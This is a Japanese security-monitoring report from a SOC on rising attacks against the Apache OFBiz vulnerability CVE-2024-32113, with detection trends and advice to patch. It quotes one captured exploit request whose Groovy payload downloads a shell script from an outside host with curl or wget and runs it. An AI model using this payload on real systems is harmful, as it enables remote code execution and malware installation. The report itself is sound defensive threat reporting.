2024.08.15

2024年7月度 MBSD-SOCの検知傾向トピックス

監視

Apache OFBiz の脆弱性（CVE-2024-32113）を狙った攻撃

　今月は、Apache OFBiz の脆弱性（CVE-2024-32113）を狙った攻撃が増加しました。Apache OFBizは、ERPやCRMなどのビジネスツールを提供するオープンソースのソフトウェアです。本脆弱性は、今年5月に公開されたパス・トラバーサルの脆弱性で、攻撃が成功した場合、リモートからコードを実行されてしまう恐れがあります。

　下図は、本脆弱性を狙った攻撃の検知数推移です。6月の検知数は数件程度でしたが、7月は検知数が増加しました。本脆弱性は、深刻度がImportantであり、既にPoC（概念実証コード）が公開されているため、当該製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。

図. Apache OFBiz の脆弱性（CVE-2024-32113）を狙った攻撃の検知数推移

　以下は、弊社SOCで検知した攻撃例です。外部から不正なshファイル（マルウェア）をダウンロードして実行を試みた通信となっています。

図. Apache OFBiz の脆弱性（CVE-2024-32113）を狙った攻撃例
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1 Host: xx.xx.xx.xx:443 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 147 groovyProgram=throw+new+Exception('curl http://xx.xx.xx.xx/sh \| sh -s ofbiz \|\| wget -O- http://xx.xx.xx.xx/sh \| sh -s ofbiz'.execute().text);

　下表は、本脆弱性を狙った攻撃元国です。ブルガリアからの攻撃を多数観測しています。